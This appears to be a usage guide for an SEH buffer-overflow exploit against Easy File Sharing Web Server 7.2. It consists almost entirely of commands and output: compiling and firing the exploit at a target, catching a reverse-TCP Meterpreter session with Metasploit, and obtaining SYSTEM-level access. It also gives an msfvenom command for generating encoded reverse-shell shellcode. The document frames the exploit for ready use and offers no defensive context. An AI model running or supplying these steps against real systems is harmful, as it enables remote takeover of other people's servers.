Easy File Sharing Web Server 7.2 SEH Overflow Exploit

Exploit

$ gcc easy-file-sharing-web-server-7.2.c -o easy-file-sharing-web-server-7.2
$ ./easy-file-sharing-web-server-7.2
Easy File Sharing Web Server 7.2 SEH Exploit
Usage: IP PORT
$ ./easy-file-sharing-web-server-7.2 "<TARGET IP>" "<TARGET PORT>"
Connected to TARGET IP on port TARGET PORT!
Sending payload ... OK!
Bytes delivered ... 7874

Meterpreter

$ sudo msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST <LISTENING IP>; set LPORT <LISTENING PORT>; set EXITFUNC seh; clear"
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on LISTENING IP:LISTENING PORT
[*] Sending stage (176198 bytes) to TARGET IP
[*] Meterpreter session 5 opened (LISTENING IP:LISTENING PORT -> TARGET IP:PORT) at 2024-09-17 12:30:21 +0100

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

A side note for a Meterpreter shell, ensure you generate custom shellcode and update the C source code file before compiling.

$ msfvenom -p windows/meterpreter/reverse_tcp LPORT=LISTENING PORT -e x86/shikata_ga_nai -b '\x00\x02\x09\x0a\x0d\x20' -v shellcode -f c

Enjoy.